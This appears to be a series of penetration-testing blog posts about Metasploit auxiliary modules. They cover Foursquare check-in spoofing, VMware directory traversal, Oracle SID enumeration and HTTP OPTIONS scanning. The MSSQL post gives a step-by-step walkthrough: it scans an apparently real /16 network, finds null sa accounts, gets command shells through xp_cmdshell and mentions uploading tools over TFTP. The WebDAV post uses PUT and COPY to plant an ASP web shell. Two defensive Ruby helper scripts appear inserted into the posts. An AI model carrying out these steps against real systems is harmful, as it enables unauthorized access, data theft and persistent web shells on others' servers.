RHOST api.foursquare.com yes The target address
RPORT 80 yes The target port
USERNAME username yes foursquare username
VENUEID 185675 yes foursquare venueid
VHOST no HTTP server virtual host

Description:
Fuck with Foursquare, be anywhere you want to be by venue id

References:
http://groups.google.com/group/foursquare-api
http://www.mikekey.com/im-a-foursquare-cheater/

msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME notmyusername@host.com
USERNAME => notmyusername@host.com
msf auxiliary(foursquare) > set PASSWORD notmypassword
PASSWORD => notmypassword
msf auxiliary(foursquare) > set VENUEID 9186
VENUEID => 9186

msf auxiliary(foursquare) > run

[*] HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Date: Fri, 19 Mar 2010 13:59:28 GMT
Content-Length: 1311
Server: nginx/0.7.64
Connection: keep-alive

Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP

[*] Auxiliary module execution completed


You can get the module here:
http://code.google.com/p/carnal0wnage/source/browse/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb

Thursday, February 25, 2010

VMWare Directory Traversal Metasploit Module

Since everyone else is releasing code to check for/exploit the VMware Server/ESX/ESXi directory traversal vulnerability, I pushed up my checker module to the Metasploit trunk as an auxiliary scanner module.

If you want to just download a full guest host, check out:
GuestStealer -- http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl

or the

nmap script -- http://www.skullsecurity.org/blog/?p=436

I don't feel like re-implementing it and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality write it or use the above tools. Gueststealer works great.

Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html


The module:
The module is simple enough. By default it checks for:

FILE /etc/vmware/hostd/vmInventory.xml

If it receives a 200 to the traversal string and file, it says it's vulnerable. If you want to see the output of the file you can uncomment the following line in the code:

#print_status("Output Of Requested File:\n#{res.body}")

Reload the module, then change the file to what you want (example: set FILE /etc/shadow).

Since VMware runs as root, you pretty much have access to anything on the file system.

Saturday, January 10, 2009

Oracle Sid Enumeration Metasploit Auxiliary Module

I recently pushed out (again with MC's help) an Oracle SID enumeration MSF auxiliary module for Oracle versions earlier than Oracle 10g Release 2. Starting with 10g Release 2 the TNS listener is protected and won't just cough up the SID for free; you'll have to guess it or brute-force it (hopefully the SID guess module will come soon).

Here it is in action

msf > use auxiliary/admin/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration.
Version: $Revision$

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port

Description:
This module simply queries the TNS listner for the Oracle SID. With
10g Release 2 and above the listener will be protected and the SID
will have to be bruteforced or guessed.

msf auxiliary(oracle_sid) > set RHOST 192.168.0.43
RHOST => 192.168.0.43
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.0.43: admin1
[*] Identified SID for 192.168.0.43: admin2
[*] Identified SID for 192.168.0.43: database
[*] Identified SID for 192.168.0.43: dba3
[*] Identified SID for 192.168.0.43: dba5
[*] Identified SID for 192.168.0.43: dba7
[*] Identified SERVICE_NAME for 192.168.0.43: admin1
[*] Identified SERVICE_NAME for 192.168.0.43: admin2
[*] Identified SERVICE_NAME for 192.168.0.43: database
[*] Identified SERVICE_NAME for 192.168.0.43: dba3
[*] Identified SERVICE_NAME for 192.168.0.43: dba5
[*] Identified SERVICE_NAME for 192.168.0.43: dba7
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

If it's protected you'll see this:

msf auxiliary(oracle_sid) > set RHOST 192.168.0.137
RHOST => 192.168.0.137
msf auxiliary(oracle_sid) > run

[-] TNS listener protected for 192.168.0.137...
[*] Auxiliary module execution completed


If you are on the MSF 3.3 trunk, an svn update should be all you need to do.

Saturday, October 6, 2007

Metasploit HTTP Options Aux Module

I basically bastardized hdm's version aux module to create an options module. I wanted something that would look for web servers that allowed the PUT method.

The code:

##
# options.rb
# bastardized from version module
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Auxiliary::Scanner::Http::Options < Msf::Auxiliary
  # Exploit mixins should be called first
  include Exploit::Remote::HttpClient

  # Scanner mixin should be near last
  include Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'HTTP Options Detection',
      'Version'     => '$Revision: 4886 $',
      'Description' => 'Display available http options about each system',
      'Author'      => 'CG',
      'License'     => MSF_LICENSE
    )
  end

  # Fingerprint a single host: send "OPTIONS *" and report the Allow header
  def run_host(ip)
    self.target_port = datastore['RPORT']

    begin
      res = send_request_raw({
        'version' => '1.0',
        'uri'     => '*',
        'method'  => 'OPTIONS'
      }, 10)

      # Only servers that answer with an Allow header get reported
      if (res and res.headers['Allow'])
        print_status("#{ip} allows #{res.headers['Allow']} methods")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end

end
end

The module in action:

msf auxiliary(options) > run
[*] a.b.c.30 allows OPTIONS, GET, HEAD, POST methods
[*] a.b.c.67 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.104 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.130 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.135 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.141 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.142 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.147 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.149 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.211 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.212 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] a.b.c.246 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) >
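Triage of the module's output lines, as an added Ruby example (not part of the module above or the WebDAV post earlier on this page, both of which use the same Allow header). It groups hosts by the methods that matter when reviewing a scan: the write methods (PUT, DELETE, MOVE, COPY, MKCOL, PROPPATCH) that mean WebDAV authoring is at least advertised, and TRACE, which is usually just unwanted. The sample lines and the helper names are constructed.

```ruby
# Added example, not the options module's code. Sample lines are constructed in
# the same shape the module prints.
SAMPLE_LINES = <<~OUT
  [*] 10.1.2.30 allows OPTIONS, GET, HEAD, POST methods
  [*] 10.1.2.67 allows OPTIONS, TRACE, GET, HEAD, POST methods
  [*] 10.1.2.147 allows GET,HEAD,POST,OPTIONS,TRACE methods
  [*] 10.1.2.212 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
  [*] Scanned 4 of 4 hosts (100% complete)
  [*] Auxiliary module execution completed
OUT

# Methods that modify content on the server
WRITE_METHODS = %w[PUT DELETE MOVE COPY MKCOL PROPPATCH].freeze

# Parse one line into [host, [methods]]; nil for lines that are not findings.
# Servers differ in separator and spacing ("GET,HEAD" vs "GET, HEAD"), so the
# split tolerates both, and the space after "[*]" is optional.
def parse_allow_line(line)
  m = line.match(/^\[\*\]\s*(\S+)\s+allows\s+(.+?)\s+methods\s*$/)
  return nil unless m
  [m[1], m[2].split(/\s*,\s*/).map { |x| x.strip.upcase }.reject(&:empty?)]
end

# Returns { write: { host => [write methods] }, trace: [hosts] }
def triage_methods(text)
  report = { write: {}, trace: [] }
  text.each_line do |line|
    host, methods = parse_allow_line(line)
    next unless host
    writable = methods & WRITE_METHODS
    report[:write][host] = writable unless writable.empty?
    report[:trace] << host if methods.include?("TRACE")
  end
  report
end

if __FILE__ == $PROGRAM_NAME
  r = triage_methods(SAMPLE_LINES)
  r[:write].each { |host, ms| puts "#{host}: advertises #{ms.join(', ')}" }
  puts "TRACE enabled on: #{r[:trace].join(', ')}"
end
```

As the post says right after the output, an advertised PUT is not the same as a writable server; the triage only tells you which hosts to verify (and which to ask the owners about), not which ones are actually exposed.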

Of course, allowing PUT doesn't necessarily allow "you" to PUT anything. Most of the time you'll find that it doesn't. That's because the web server on IIS 5+ doesn't allow write or modify by default.

cg@segfault:~$ cadaver
dav:!> open http://a.b.c.246
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 3981 bytes failed:
403 Forbidden
dav:/> exit

Sunday, September 9, 2007

old school 0wning MSSQL --fun from the field

rule #1: don't expose your database to the world

rule #2: don't have a null sa account, especially if you are violating rule #1...

let's see...

Use unicornscan to search for hosts with TCP port 1433 open:

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

Run the hosts that respond through the MSF auxiliary module mssql_ping to see if we can get any version information. I'll omit the ones that didn't respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

Now, let's run them through mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

Then let's use sqlcmd to see if we can get a command shell on the box. sqlcmd uses xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuração de IP do Windows


Adaptador Ethernet Conexão local:
Estado da mídia . . . . . . . . . . . : mídia desconectada

Adaptador Ethernet Conexão de rede sem fio:
Estado da mídia . . . . . . . . . . . : mídia desconectada

Adaptador PPP POP:
Sufixo DNS específico de conexão. :
Endereço IP . . . . . . . . . . . . : A.B.X.28
Máscara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padrão. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuração de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.5
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.6
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some old school YR 2000 tftp-upload-your-tools fun.

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG

Sunday, August 19, 2007

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module, I wanted to see if I could get one going that would pull down the HTTP verbs allowed on a web server.

Basically I wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a Metasploit auxiliary module. So I got it going... it's mostly HD's module, but I changed what needed to be changed to get it to work.
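As an added example (not HD's module and not the module from this post), here is a standalone Ruby script that sends the same "OPTIONS *" probe shown above, parses the Allow: and Public: headers, and flags the write-capable WebDAV methods a server advertises, so the list can be compared against what the server is actually supposed to permit. The host and port arguments are assumed; nothing here depends on the Metasploit framework.

```ruby
require 'socket'

# Added example, not the blog's or HD's module: send the same "OPTIONS *"
# probe, parse Allow:/Public:, and flag write-capable WebDAV methods so the
# advertised list can be compared with the server's intended write policy.

# Methods that change content on the server. IIS may advertise them in
# Allow: even when write permission is denied (hence the 403 on PUT above).
WRITE_METHODS = %w[PUT DELETE COPY MOVE MKCOL PROPPATCH LOCK UNLOCK].freeze

# Same request typed into nc in the post, plus a Host: header for vhosts.
def options_request(host)
  "OPTIONS * HTTP/1.0\r\nHost: #{host}\r\n\r\n"
end

# Parse a raw HTTP response into status, Server header and method lists.
# Handles both comma styles seen in the module output above
# ("OPTIONS, TRACE, GET" and "GET,HEAD,POST").
def parse_options_response(raw)
  head = raw.split(/\r?\n\r?\n/, 2).first.to_s
  lines = head.split(/\r?\n/)
  status = lines.shift.to_s[%r{\AHTTP/\d\.\d (\d{3})}, 1].to_i
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.to_s.strip if name && value
  end
  split = ->(v) { v.to_s.split(',').map { |m| m.strip.upcase }.reject(&:empty?) }
  { status: status, server: headers['server'],
    allow: split.call(headers['allow']), public: split.call(headers['public']) }
end

# Subset of the advertised methods that allow writes, in server order.
def write_methods(allowed)
  allowed & WRITE_METHODS
end

# Live probe against one host, e.g. probe_options('192.168.0.109').
# HTTP/1.0 with Connection: close means read-to-EOF returns the whole reply.
def probe_options(host, port = 80)
  sock = TCPSocket.new(host, port)
  sock.write(options_request(host))
  raw = sock.read
  sock.close
  parse_options_response(raw)
end
```

Running write_methods over the parsed Allow: list turns the long method string into the short list an admin actually needs to review.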

cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

I'll post the code on carnal0wnage when I get off my butt, along with a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

Then you have to do a MOVE or COPY request. Personally I was having issues getting a MOVE request to work with a netcat connection, so I used...

**UPDATE
It ended up being the carriage returns (or lack thereof) that were causing me to get a 400 Bad Request error. I couldn't get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

From there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)

Interacting with our cmdx.aspx to list the directory contents of the C drive


-CG